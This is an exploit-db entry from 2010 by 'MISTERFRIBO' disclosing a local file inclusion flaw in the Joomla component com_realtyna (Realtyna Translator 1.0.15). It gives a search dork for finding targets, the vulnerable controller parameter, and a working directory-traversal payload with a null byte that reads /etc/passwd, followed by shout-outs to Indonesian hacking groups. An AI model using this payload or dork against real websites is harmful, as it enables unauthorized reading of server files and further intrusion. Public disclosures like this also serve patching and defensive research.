Joomla! Component Realtyna Translator 1.0.15 – Local File Inclusion (2)

  • 作者: MISTERFRIBO
    日期: 2010-06-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14017/
  • =================================================
    Joomla Component com_realtyna LFI vulnerability
    =================================================
    
    
    [!]===========================================================================[!]
    
    [~] Joomla Component com_realtyna LFI vulnerability
    [~] Author : MISTERFRIBO
    [~] Homepage : http://www.indonesianhacker.or.id
    [~] Vendor: http://software.realtyna.com/
    [~] Date : 23 june, 2010
    
    [!]===========================================================================[!]
    
    [^] dork : inurl:"joomla"
    [!]===========================================================================[!]
    
    [ Vulnerable File ]=-
    
    http://[localhost]/index.php?option=com_realtyna&controller=[FRIBO]
    
    [ XpL ]=-
    
    ../../../../../../../../../../../../../../../etc/passwd%00
    
    
    
    
    [!]===========================================================================[!]
    
    [ Thx TO ]=-
    
    [+] Indonesian Hacker Team, Arumbia, IndonesianCoder Team, Kill-9,
    Yogyacarderlink, ServerIsDown
    [+] tukulesto,Kamtiez,xr0b0t si om
    bagus,arianom,N4CK0,Jundab,bobyhikaru,gonzhack,senot,Jack-
    [+]
    Contrex,YadoY666,bumble_be,MarahMeraH,Suddendeath,r4tu_l364h,IBL13Z,r3m1ck
    [+] ELVIN4,Gh4mb4s,vYcOd,ayy,otong,CS-31,yur4kh4,ranggamagic
    [+] v3n0m, z0mb13, setanmuda, Jali, Hmei7
    
    [ NOTE ]=-
    
    [+] Mrs.Fribo Jangan Marah Terus Donk. LoVe u saiiank :*
    [+] eLv1n4 where are you?
    [+] papi karma666 and mami winda, Selamat ya :D
    
    
    [ Spoiler ]=-
    
    [+] Indonesian Hacker Team Was Here
    [+] www.fribo.tv